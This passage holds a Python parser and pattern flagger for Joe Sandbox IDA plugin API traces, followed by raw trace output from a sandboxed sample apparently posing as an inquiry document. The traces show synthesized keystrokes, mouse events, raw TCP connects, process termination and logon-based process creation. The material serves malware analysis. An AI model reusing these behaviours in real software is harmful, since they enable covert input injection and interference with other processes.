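# One trace line: optional bullet, optional "Part of subcall function X:" prefix,
# API.MODULE, optional "(args)", then "ref: ADDR". Some lines have no parentheses
# (e.g. "WSAGetLastError.WSOCK32 ref: 00E66534"), so the arg group is optional.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Constants whose values are unambiguous for the argument position they sit in.
WINDOW_MESSAGES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0xA1: "WM_NCLBUTTONDOWN",
                   0xB0: "EM_GETSEL", 0xF0: "BM_GETCHECK", 0xF1: "BM_SETCHECK"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
SOCKET_ARGS = ({2: "AF_INET"}, {1: "SOCK_STREAM"}, {6: "IPPROTO_TCP"})
IOCTL_CMDS = {0x8004667E: "FIONBIO"}


def _hex(arg):
    """Parse a hex immediate; '?' (unresolved by the plugin) becomes None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode(api, args):
    """Return args with positional immediates replaced by symbolic names where known."""
    out = list(args)
    if api in ("PostMessageW", "SendMessageW") and len(args) >= 3:
        msg, wparam = _hex(args[1]), _hex(args[2])
        if msg in WINDOW_MESSAGES:
            out[1] = WINDOW_MESSAGES[msg]
            if msg in (0x100, 0x101) and wparam in VIRTUAL_KEYS:
                out[2] = VIRTUAL_KEYS[wparam]
    elif api == "socket" and len(args) >= 3:
        for i, table in enumerate(SOCKET_ARGS):
            v = _hex(args[i])
            if v in table:
                out[i] = table[v]
    elif api == "ioctlsocket" and len(args) >= 2:
        v = _hex(args[1])
        if v in IOCTL_CMDS:
            out[1] = IOCTL_CMDS[v]
    return out


@dataclass
class Call:
    api: str
    module: str
    args: list          # raw strings as printed by the plugin
    ref: str            # call-site address
    subcall: bool       # True for "Part of subcall function" lines
    decoded: list = field(default_factory=list)


def parse_line(line):
    """Parse one trace line; returns None for headers such as 'APIs' or 'Strings'."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return Call(m["api"], m["module"], args, m["ref"].upper(),
                "subcall" in line, decode(m["api"], args))


def parse_trace(text):
    return [c for c in map(parse_line, text.splitlines()) if c]


def find_patterns(calls):
    """Flag the two behaviours visible in this report's traces (names are the example's)."""
    direct = [c for c in calls if not c.subcall]
    apis = {c.api for c in direct}
    found = set()
    keys = {c.decoded[2] for c in direct
            if c.api == "PostMessageW" and c.decoded[1] in ("WM_KEYDOWN", "WM_KEYUP")}
    if {"GetKeyboardState", "SetKeyboardState"} <= apis and keys & set(VIRTUAL_KEYS.values()):
        found.add("synthesized_modifier_keys")
    if {"socket", "connect"} <= apis and any(
            c.api == "ioctlsocket" and c.decoded[1] == "FIONBIO" for c in direct):
        found.add("nonblocking_tcp_connect")
    return found


# Sample input: trace lines copied from this report section.
SAMPLE_KEYBOARD = """• GetParent.USER32(00000000), ref: 00E512B5
• GetKeyboardState.USER32(?), ref: 00E512CA
• SetKeyboardState.USER32(?), ref: 00E5132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E51357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E51374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E513B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E513D9"""

SAMPLE_SOCKET = """  • Part of subcall function 00E680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E664D9
• WSAGetLastError.WSOCK32(00000000), ref: 00E664E8
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E66521
• connect.WSOCK32(00000000,?,00000010), ref: 00E6652A
• WSAGetLastError.WSOCK32 ref: 00E66534
• closesocket.WSOCK32(00000000), ref: 00E6655D
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E66576"""

if __name__ == "__main__":
    for text in (SAMPLE_KEYBOARD, SAMPLE_SOCKET):
        calls = parse_trace(text)
        for c in calls:
            print(f"{c.ref}  {c.api}({', '.join(c.decoded)})")
        print("patterns:", sorted(find_patterns(calls)))
```

Unresolved arguments stay as "?" and constants outside the tables are left as raw hex, so an unfamiliar message number is never mislabelled; extend the tables only with values you have checked against the SDK headers for that argument position.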
                                          APIs
                                            • Part of subcall function 00E680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E664D9
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E664E8
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E66521
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00E6652A
                                          • WSAGetLastError.WSOCK32 ref: 00E66534
                                          • closesocket.WSOCK32(00000000), ref: 00E6655D
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E66576
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E4E0FA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E4E120
                                          • SysAllocString.OLEAUT32(00000000), ref: 00E4E123
                                          • SysAllocString.OLEAUT32 ref: 00E4E144
                                          • SysFreeString.OLEAUT32 ref: 00E4E14D
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00E4E167
                                          • SysAllocString.OLEAUT32(?), ref: 00E4E175
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          APIs
                                            • Part of subcall function 00DF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DF1D73
                                            • Part of subcall function 00DF1D35: GetStockObject.GDI32(00000011), ref: 00DF1D87
                                            • Part of subcall function 00DF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF1D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E778A1
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E778AE
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E778B9
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E778C8
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E778D4
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E14292,?), ref: 00E141E3
                                          • GetProcAddress.KERNEL32(00000000), ref: 00E141EA
                                          • EncodePointer.KERNEL32(00000000), ref: 00E141F6
                                          • DecodePointer.KERNEL32(00000001,00E14292,?), ref: 00E14213
                                          Strings
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E141B8), ref: 00E142B8
                                          • GetProcAddress.KERNEL32(00000000), ref: 00E142BF
                                          • EncodePointer.KERNEL32(00000000), ref: 00E142CA
                                          • DecodePointer.KERNEL32(00E141B8), ref: 00E142E5
                                          Strings
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          APIs
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70548
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E70588
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E705AB
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E705D4
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E70617
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E70624
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          APIs
                                          • GetMenu.USER32(?), ref: 00E75A82
                                          • GetMenuItemCount.USER32(00000000), ref: 00E75AB9
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E75AE1
                                          • GetMenuItemID.USER32(?,?), ref: 00E75B50
                                          • GetSubMenu.USER32(?,?), ref: 00E75B5E
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E75BAF
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E4F3F7
                                          • VariantClear.OLEAUT32(00000013), ref: 00E4F469
                                          • VariantClear.OLEAUT32(00000000), ref: 00E4F4C4
                                          • _memmove.LIBCMT ref: 00E4F4EE
                                          • VariantClear.OLEAUT32(?), ref: 00E4F53B
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E4F569
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          APIs
                                          • _memset.LIBCMT ref: 00E52747
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E52792
                                          • IsMenu.USER32(00000000), ref: 00E527B2
                                          • CreatePopupMenu.USER32 ref: 00E527E6
                                          • GetMenuItemCount.USER32(000000FF), ref: 00E52844
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E52875
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DF179A
                                          • GetWindowRect.USER32(?,?), ref: 00DF17FE
                                          • ScreenToClient.USER32(?,?), ref: 00DF181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DF182C
                                          • EndPaint.USER32(?,?), ref: 00DF1876
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          APIs
                                          • ShowWindow.USER32(00EB67B0,00000000,017959C8,?,?,00EB67B0,?,00E7B862,?,?), ref: 00E7B9CC
                                          • EnableWindow.USER32(00000000,00000000), ref: 00E7B9F0
                                          • ShowWindow.USER32(00EB67B0,00000000,017959C8,?,?,00EB67B0,?,00E7B862,?,?), ref: 00E7BA50
                                          • ShowWindow.USER32(00000000,00000004,?,00E7B862,?,?), ref: 00E7BA62
                                          • EnableWindow.USER32(00000000,00000001), ref: 00E7BA86
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E7BAA9
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00E65134,?,?,00000000,00000001), ref: 00E673BF
                                            • Part of subcall function 00E63C94: GetWindowRect.USER32(?,?), ref: 00E63CA7
                                          • GetDesktopWindow.USER32 ref: 00E673E9
                                          • GetWindowRect.USER32(00000000), ref: 00E673F0
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E67422
                                            • Part of subcall function 00E554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E5555E
                                          • GetCursorPos.USER32(?), ref: 00E6744E
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E674AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 18ca42f7320b2d43cdea51859d71527b6834a336a10118f86d21f2ffa9fa560a
                                          • Instruction ID: 63e1f600e7373d3fd1b68d94dae32520c844ce896ab04a5fe4e937313303a3bb
                                          • Opcode Fuzzy Hash: 18ca42f7320b2d43cdea51859d71527b6834a336a10118f86d21f2ffa9fa560a
                                          • Instruction Fuzzy Hash: 28310472508305AFC720DF55D849F9BBBE9FF88358F000919F899A7191DB30E948CB92
                                          APIs
                                            • Part of subcall function 00E485F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E48608
                                            • Part of subcall function 00E485F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E48612
                                            • Part of subcall function 00E485F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E48621
                                            • Part of subcall function 00E485F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E48628
                                            • Part of subcall function 00E485F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E4863E
                                          • GetLengthSid.ADVAPI32(?,00000000,00E48977), ref: 00E48DAC
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E48DB8
                                          • HeapAlloc.KERNEL32(00000000), ref: 00E48DBF
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E48DD8
                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E48977), ref: 00E48DEC
                                          • HeapFree.KERNEL32(00000000), ref: 00E48DF3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 65654a9b9e3f08ed9fe16b366c7a1969d96fbccbe74f90575bed530a0ceb888f
                                          • Instruction ID: e9d9b278689b703d24527bfe611202a6aaaa341ce21a3a0919fd55bb4505230d
                                          • Opcode Fuzzy Hash: 65654a9b9e3f08ed9fe16b366c7a1969d96fbccbe74f90575bed530a0ceb888f
                                          • Instruction Fuzzy Hash: 1511CA31902A04EFDB10DFA5ED08BBE7BADEB41319F104129E849A3251CB329944DB60
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E48B2A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00E48B31
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E48B40
                                          • CloseHandle.KERNEL32(00000004), ref: 00E48B4B
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E48B7A
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E48B8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 13940f0f33b4ebc1e88483362387714755f77650ba24373ec9320dffc461e01d
                                          • Instruction ID: 8872e46f6ace6210f17157398191d74b4ec3f490f4402c1d45143c0436793cc5
                                          • Opcode Fuzzy Hash: 13940f0f33b4ebc1e88483362387714755f77650ba24373ec9320dffc461e01d
                                          • Instruction Fuzzy Hash: A21147B6500209AFDF01CFA5ED49FDE7BA9FF08349F045065FA08B2160C6729DA4AB60
                                          APIs
                                            • Part of subcall function 00DF12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF134D
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF135C
                                            • Part of subcall function 00DF12F3: BeginPath.GDI32(?), ref: 00DF1373
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF139C
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E7C1C4
                                          • LineTo.GDI32(00000000,00000003,?), ref: 00E7C1D8
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E7C1E6
                                          • LineTo.GDI32(00000000,00000000,?), ref: 00E7C1F6
                                          • EndPath.GDI32(00000000), ref: 00E7C206
                                          • StrokePath.GDI32(00000000), ref: 00E7C216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 5a6475668213a8aa8d4758c9e108ede0e4c3f66b42f3c18575794b002ea371c1
                                          • Instruction ID: 3d4cc62784bd151331cb6a72745acbd3784121a93a350017baa77fd13cb84b1c
                                          • Opcode Fuzzy Hash: 5a6475668213a8aa8d4758c9e108ede0e4c3f66b42f3c18575794b002ea371c1
                                          • Instruction Fuzzy Hash: 8811097640014CBFDB119F91EC88EAA7FADEB08354F048025FA186A162C7719D99DBA0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E103D3
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E103DB
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E103E6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E103F1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E103F9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E10401
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: dae2f7f794d17cef2d3d6360a31311cfc3b9292b6c7f12e32bc9fd5a8390c536
                                          • Instruction ID: ca94f48baad73df60253ee3054548406a431e4a927bad1ee5c455db9f192d7f7
                                          • Opcode Fuzzy Hash: dae2f7f794d17cef2d3d6360a31311cfc3b9292b6c7f12e32bc9fd5a8390c536
                                          • Instruction Fuzzy Hash: F4016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A868CBE5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E5569B
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E556B1
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00E556C0
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E556CF
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E556D9
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E556E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: e0814fdbab51ce9d50f1af797a24243cc91a207ff71f30f3052b9ea8074d2b1a
                                          • Instruction ID: 90c2915977462a01e7d03d637b6f8f65743cd2c4d82ff901fb9e9a2239422db1
                                          • Opcode Fuzzy Hash: e0814fdbab51ce9d50f1af797a24243cc91a207ff71f30f3052b9ea8074d2b1a
                                          • Instruction Fuzzy Hash: F8F06D32241158BFE3209BA39C0DEAB7B7CEBC6B12F000169FA08E105196A01A45C6B5
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00E574E5
                                          • EnterCriticalSection.KERNEL32(?,?,00E01044,?,?), ref: 00E574F6
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00E01044,?,?), ref: 00E57503
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E01044,?,?), ref: 00E57510
                                            • Part of subcall function 00E56ED7: CloseHandle.KERNEL32(00000000,?,00E5751D,?,00E01044,?,?), ref: 00E56EE1
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E57523
                                          • LeaveCriticalSection.KERNEL32(?,?,00E01044,?,?), ref: 00E5752A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 589da70361c6fa68a2a886648499e4ad74f7fd482ca2df6296ac873d95afe2ef
                                          • Instruction ID: ff443f27a6e6d06b5a896505df9a785e4ec4bdf7913a3d406b37a90c4748e223
                                          • Opcode Fuzzy Hash: 589da70361c6fa68a2a886648499e4ad74f7fd482ca2df6296ac873d95afe2ef
                                          • Instruction Fuzzy Hash: 97F09A3A444612EFDB115B24FC889EA372ABF04302F001531FA06B10B6DF715898CAA0
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E48E7F
                                          • UnloadUserProfile.USERENV(?,?), ref: 00E48E8B
                                          • CloseHandle.KERNEL32(?), ref: 00E48E94
                                          • CloseHandle.KERNEL32(?), ref: 00E48E9C
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E48EA5
                                          • HeapFree.KERNEL32(00000000), ref: 00E48EAC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: dabc2cf1636516c2aaf6b8f31bd1fccb7de8b91069bfd002af555b862f57a8de
                                          • Instruction ID: a9aa564086a191854e64c607c0b25ec398fe8ef25590cbf763787e5b2fc55d66
                                          • Opcode Fuzzy Hash: dabc2cf1636516c2aaf6b8f31bd1fccb7de8b91069bfd002af555b862f57a8de
                                          • Instruction Fuzzy Hash: 4CE0C236004001FFDA019FF2EC0C90ABB69FB89322B508231F21DA2471CB3294A8EB60
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E82C7C,?), ref: 00E47C32
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E82C7C,?), ref: 00E47C4A
                                          • CLSIDFromProgID.OLE32(?,?,00000000,00E7FB80,000000FF,?,00000000,00000800,00000000,?,00E82C7C,?), ref: 00E47C6F
                                          • _memcmp.LIBCMT ref: 00E47C90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID: ,,
                                          • API String ID: 314563124-1556401989
                                          • Opcode ID: b631ef66a2f4c7aff04e3de46666c7f489936d950a139adc7606ae60e9162ad4
                                          • Instruction ID: 658234a3aef532e7f66da74179a5daf9aead1134f3e06aa90e5192d527d2aeb0
